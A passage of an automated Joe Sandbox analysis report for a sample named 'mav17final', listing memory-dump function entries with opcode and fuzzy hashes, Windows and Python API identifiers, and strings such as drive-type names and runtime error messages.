                                                  • Opcode ID: 6b546dbecff8f1a26dce1183042867b9cf570910ff2c42ef26f65990958e394d
                                                  • Instruction ID: 4821e185b3dd3826f60fdfef9bba1ea5e39efeabbad09bb5fc019dc9335a2473
                                                  • Opcode Fuzzy Hash: 6b546dbecff8f1a26dce1183042867b9cf570910ff2c42ef26f65990958e394d
                                                  • Instruction Fuzzy Hash: C3F0A920F0DA8382FF594F6EA8842391A51AF687E1F041038DF0E43795EE3CE8878700
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Dealloc$Object_Track
                                                  • String ID:
                                                  • API String ID: 887704541-0
                                                  • Opcode ID: 3d42f6f96641afa8e40a9b95133215a649903610cae807ab0b9964238f53290f
                                                  • Instruction ID: fc5a6ede63d476f20d777d1a17e993c1f82cfd439f55cbf0608eafd62376fc97
                                                  • Opcode Fuzzy Hash: 3d42f6f96641afa8e40a9b95133215a649903610cae807ab0b9964238f53290f
                                                  • Instruction Fuzzy Hash: 7A019636E0AB92C1EE99DF79E8541382764AF4ABB6B285130CB8D42754CE2DE441C350
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: State_$EnsureInitializeInitializedRelease
                                                  • String ID:
                                                  • API String ID: 2621580956-0
                                                  • Opcode ID: 228736a826a5a1ff67be1b297f58c8bae0a48c2954096bea5476443be523e544
                                                  • Instruction ID: 1af53cce89f9c5c2177776f1878345d7119d1b8d1bcb7b606599d3c3d7c3dc7d
                                                  • Opcode Fuzzy Hash: 228736a826a5a1ff67be1b297f58c8bae0a48c2954096bea5476443be523e544
                                                  • Instruction Fuzzy Hash: 8DF03021B08BC182E7405F66F8440296A60AF5AFE1F6C5034EB8943715DE3CD4918700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Entry2
                                                  • String ID: (KKKKKKKK)$GetIfEntry() or GetIfEntry2() syscalls failed.
                                                  • API String ID: 1297607578-1738093298
                                                  • Opcode ID: 14c815fd6ae0ab3f5606a145089b887e96643bb891819ee114bb01040e452990
                                                  • Instruction ID: f97243bfd259a4d2ab97b7311aaa44c2c55a6cba890e7536167066b4c41e6e96
                                                  • Opcode Fuzzy Hash: 14c815fd6ae0ab3f5606a145089b887e96643bb891819ee114bb01040e452990
                                                  • Instruction Fuzzy Hash: 50515621A09BCA86EE548F29A84427D6BA0FF64BE5F084035DF4E47794EF3CE446C720
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073581981.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                  • Associated: 00000002.00000002.2073546754.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073621002.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073653780.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073688952.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8ba240000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: abort$CreateFrameInfo
                                                  • String ID: csm
                                                  • API String ID: 2697087660-1018135373
                                                  • Opcode ID: 5e4671b1cbff3658d511699c3cf653202505efa909c7ec854f7fa1af4338784c
                                                  • Instruction ID: a1d5a17aa86bceafa756fb287dc46e21ced2145a381fdfbbb37f225173f6d67f
                                                  • Opcode Fuzzy Hash: 5e4671b1cbff3658d511699c3cf653202505efa909c7ec854f7fa1af4338784c
                                                  • Instruction Fuzzy Hash: 64512932A1878286EA20EB2AE15026E77A4FB88FD0F100575DF8D07B55DF3CE464DB00
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073581981.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                  • Associated: 00000002.00000002.2073546754.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073621002.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073653780.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073688952.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8ba240000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Name::operator+
                                                  • String ID: void$void
                                                  • API String ID: 2943138195-3746155364
                                                  • Opcode ID: 7dcf970a61f58172c3a4f39e178d28c376ed2dbead67cac1058dce2bd18ce07b
                                                  • Instruction ID: 10861b534a5df2eb0c98dfcdfda240223cd47e61f47d8a17b905e1ad0b8d99cd
                                                  • Opcode Fuzzy Hash: 7dcf970a61f58172c3a4f39e178d28c376ed2dbead67cac1058dce2bd18ce07b
                                                  • Instruction Fuzzy Hash: 9C313A62E18B5698FB01CFA8E8811FC37B0BB48B88B444576EF4E56B59DF3CA144D750
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: AdaptersAddresses
                                                  • String ID: GetAdaptersAddresses() syscall failed.
                                                  • API String ID: 2506852604-4058666537
                                                  • Opcode ID: d101b9013dadac10b624a53d313ad985bcf945ba5d4eee5b36ee356b8a81db31
                                                  • Instruction ID: 760d82d0b1c50da5fa48e73ed4e156f2c00a7351b3669c7964387a0e88b6cd87
                                                  • Opcode Fuzzy Hash: d101b9013dadac10b624a53d313ad985bcf945ba5d4eee5b36ee356b8a81db31
                                                  • Instruction Fuzzy Hash: AA215425B18AC283DF14DF39E84556A67A1FB987A4F845035DB4E47B14DF3DD44ACB00
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: CloseHandle$QueryVirtual
                                                  • String ID: (KsOI)
                                                  • API String ID: 3966390079-341566991
                                                  • Opcode ID: 5d58f94e0c7063d1f9754a7f14833d87991715d269e1c21cdb0770847f64694a
                                                  • Instruction ID: 4fe07bad88f4071b9f6270463be81c7432823dee815572cc2cf867bbaa6b6ac3
                                                  • Opcode Fuzzy Hash: 5d58f94e0c7063d1f9754a7f14833d87991715d269e1c21cdb0770847f64694a
                                                  • Instruction Fuzzy Hash: 51111C25A0DAC681EE649F6AA8543797761BF64BE5F444031CF4E47754EE3CE0178700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: CloseHandle$QueryVirtual
                                                  • String ID: (KsOI)
                                                  • API String ID: 3966390079-341566991
                                                  • Opcode ID: 254bed0aad9f9968bbd4bf8c78f8dc4074290d1573cad8042a9eac18a45ae8ad
                                                  • Instruction ID: ed08835a6623da63504a1ac54e78c387ff92481b821544a24581112311101c46
                                                  • Opcode Fuzzy Hash: 254bed0aad9f9968bbd4bf8c78f8dc4074290d1573cad8042a9eac18a45ae8ad
                                                  • Instruction Fuzzy Hash: 0A111C25A0DAC681EE649F6AA8543797761BF64BE5F444031CF4E47754EE3CE0178700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: CloseHandle$QueryVirtual
                                                  • String ID: (KsOI)
                                                  • API String ID: 3966390079-341566991
                                                  • Opcode ID: 50ef92c344278f83e193f52241ba6d6c11d405ba151e8597f3e6822c0cdc6b78
                                                  • Instruction ID: 9db89939bb6d08a86076ed3e0bc6f49f50bde8abcfbdf67a78668c74140053b0
                                                  • Opcode Fuzzy Hash: 50ef92c344278f83e193f52241ba6d6c11d405ba151e8597f3e6822c0cdc6b78
                                                  • Instruction Fuzzy Hash: A8111C25A0DAC681EE649F6AA8543797761BF64BE5F444031CF4E47754EE3CE0178700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: CloseHandle$QueryVirtual
                                                  • String ID: (KsOI)
                                                  • API String ID: 3966390079-341566991
                                                  • Opcode ID: ed50a41741cc32e10fbc317f7f70ba1ff0e5041f5155fb48ba9c62befd946438
                                                  • Instruction ID: d36aa5bbdaa8135be1d133227ed2789913ed9d3dc3c78a655f58445ce5818707
                                                  • Opcode Fuzzy Hash: ed50a41741cc32e10fbc317f7f70ba1ff0e5041f5155fb48ba9c62befd946438
                                                  • Instruction Fuzzy Hash: D3111C25A0DAC681EE649F6AA8543797761BF64BE5F444031CF4E47754EE3CE0178700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: CloseHandle$QueryVirtual
                                                  • String ID: (KsOI)
                                                  • API String ID: 3966390079-341566991
                                                  • Opcode ID: 1947aba3c38216af73f6a8bcf8645978b1f766e944b610f994e34f79479488d4
                                                  • Instruction ID: 3e72060dec92c779884e8876f0f527671632b75980110cbba5dfadbc4e60a8c3
                                                  • Opcode Fuzzy Hash: 1947aba3c38216af73f6a8bcf8645978b1f766e944b610f994e34f79479488d4
                                                  • Instruction Fuzzy Hash: 80111C25A0DAC681EE649F6AA8543797761BF64BE5F444031CF4E47754EE3CE0178700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: CloseHandle$QueryVirtual
                                                  • String ID: (KsOI)
                                                  • API String ID: 3966390079-341566991
                                                  • Opcode ID: 151b7a8d80dcba40fcfe21bf746d29330e345b7ce5aff5766b4f76d73daef759
                                                  • Instruction ID: 6b1d89cd648a1fb9f3bb32134750bf9f869a8967364521eb0900d07ef663930f
                                                  • Opcode Fuzzy Hash: 151b7a8d80dcba40fcfe21bf746d29330e345b7ce5aff5766b4f76d73daef759
                                                  • Instruction Fuzzy Hash: 4C111C25A0DAC681EE649F6AA8583797761BF64BE5F444031CF4E47754EE3CE0178700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: ErrorMode
                                                  • String ID: (ssssIi)$cdrom
                                                  • API String ID: 2340568224-2526730455
                                                  • Opcode ID: 2168a3a5ba0ea2bd28bec2a3a1a75b4c7cd237cd1a2e042f965d30902fe270f6
                                                  • Instruction ID: a8d468d1508e7f05c99c81f3ef49126e346fead1212a3e1ff1cfe9ab46665c42
                                                  • Opcode Fuzzy Hash: 2168a3a5ba0ea2bd28bec2a3a1a75b4c7cd237cd1a2e042f965d30902fe270f6
                                                  • Instruction Fuzzy Hash: 8F115C62A09BC685EF20DF29A8083B96BA0FBA8BE4F444431CA4D46754DF3CE54AC700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: ErrorMode
                                                  • String ID: (ssssIi)$removable
                                                  • API String ID: 2340568224-1181830169
                                                  • Opcode ID: f7fa56cbcf72cb8298466a65ab87173f38330a48a8cb8a30748b62cfdd258d39
                                                  • Instruction ID: 638ba2b02cec6cdf13cc4c9c09e59f4035212fbd7d7c1fbb087a1f6c3fcfedbe
                                                  • Opcode Fuzzy Hash: f7fa56cbcf72cb8298466a65ab87173f38330a48a8cb8a30748b62cfdd258d39
                                                  • Instruction Fuzzy Hash: 51115C62A09BC685EF20DF29A8083B96BA0FBA8BE4F444431DA4D46754DF3CE54AC700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: ErrorMode
                                                  • String ID: (ssssIi)$fixed
                                                  • API String ID: 2340568224-582244994
                                                  • Opcode ID: 1273737ecddc35d547f9797eefb13837d84265b7fc99937e5eec810aece3f242
                                                  • Instruction ID: d526ed2ae739fb92972e6f220aab62371d2349d021bf1657cb6d584e884bff95
                                                  • Opcode Fuzzy Hash: 1273737ecddc35d547f9797eefb13837d84265b7fc99937e5eec810aece3f242
                                                  • Instruction Fuzzy Hash: 53115E62A09BC685EF20DF29A8083B96BA0FBA4BE4F448431CA4D46754DF3CE546C700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: ErrorMode
                                                  • String ID: (ssssIi)$remote
                                                  • API String ID: 2340568224-2439754154
                                                  • Opcode ID: be548896485e9aada0a4cc7ef498c54301aa554ebc19f2899d8954fd66e1924e
                                                  • Instruction ID: c6441c565e5a838379629773fd1d87319f9ffe3a567537ee7a350bd6cfeca59b
                                                  • Opcode Fuzzy Hash: be548896485e9aada0a4cc7ef498c54301aa554ebc19f2899d8954fd66e1924e
                                                  • Instruction Fuzzy Hash: 2B115E62A09BC685EF20DF29A8083B96BA0FBA4BE4F444431CA4D46754DF3CE546C700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: ErrorMode
                                                  • String ID: (ssssIi)$ramdisk
                                                  • API String ID: 2340568224-2047227641
                                                  • Opcode ID: fbdad31f6192c8c6eadf597930b33b17e424c5a2c29a370213151f7863a3fc43
                                                  • Instruction ID: fed5dfe1c63b957ba7889f0d53966cebad0b873c277f2b011b346c31f1d92c0f
                                                  • Opcode Fuzzy Hash: fbdad31f6192c8c6eadf597930b33b17e424c5a2c29a370213151f7863a3fc43
                                                  • Instruction Fuzzy Hash: 8E115C62A09BC685EF60DF29A8083B96BA0FBA8BE4F444435DA4D46754DF3CE54AC700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: ErrorMode
                                                  • String ID: (ssssIi)$unknown
                                                  • API String ID: 2340568224-3196183135
                                                  • Opcode ID: eae622f4802fce6b8495e673403dfaa2573f4e18905d76c885cc3e1075e3457b
                                                  • Instruction ID: 4703639fe6686c0b244d2c8197c976cb04339513ec216761bf94e4ebe88d2e26
                                                  • Opcode Fuzzy Hash: eae622f4802fce6b8495e673403dfaa2573f4e18905d76c885cc3e1075e3457b
                                                  • Instruction Fuzzy Hash: 10115E62A09BC685EF20DF29A8083B96BA0FBA4BE4F444431DA4D46754DF3CE546C700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: ErrorMode
                                                  • String ID: (ssssIi)$unmounted
                                                  • API String ID: 2340568224-3738632989
                                                  • Opcode ID: e703148b4104a18077736411c53b7d987764021e2b097b77980d6e84312882a6
                                                  • Instruction ID: 434db8fc7f8b9bf2fb272feb80a4cb64ce5533531baeefdf8974b54ab7287dbf
                                                  • Opcode Fuzzy Hash: e703148b4104a18077736411c53b7d987764021e2b097b77980d6e84312882a6
                                                  • Instruction Fuzzy Hash: 53115E62A09BC685EF20DF29A8083B96BA0FBA4BE4F444431CA4D46754DF3CE546C700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073581981.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                  • Associated: 00000002.00000002.2073546754.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000002.00000002.2073621002.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000002.00000002.2073653780.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000002.00000002.2073688952.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8ba240000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: FileHeader$ExceptionRaise
                                                  • String ID: Access violation - no RTTI data!$Bad dynamic_cast!
                                                  • API String ID: 3685223789-3176238549
                                                  • Opcode ID: 7bbd72394c3e749fc10370465baa4d9a755cb91736d17097c685b3404c0deaff
                                                  • Instruction ID: 625ff82aa209dff45b47e21a6b54aeb4c576ae4b1c6422b15912aca15a360f27
                                                  • Opcode Fuzzy Hash: 7bbd72394c3e749fc10370465baa4d9a755cb91736d17097c685b3404c0deaff
                                                  • Instruction Fuzzy Hash: BD017161A29A8791EF40DB18E5511B86361FF40FD4F4050B2EF0E06669EF7CE548D700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Err_FormatLongLong_
                                                  • String ID: one character bytes, bytearray or integer expected
                                                  • API String ID: 832222675-2748977362
                                                  • Opcode ID: 4171aea13ba1fa0aee4d8e851ffe7b5e382af772fa60775af7b968a914772540
                                                  • Instruction ID: 2a6473635eaa7b13ea23c7597610a5f4ffbf5be7b98bfdc0f23a49b745770445
                                                  • Opcode Fuzzy Hash: 4171aea13ba1fa0aee4d8e851ffe7b5e382af772fa60775af7b968a914772540
                                                  • Instruction Fuzzy Hash: 4C113D23A08BC385EB558F2DE5941792BA1EF5AFE6F18A031CB8D47351CE2CE4A4C301
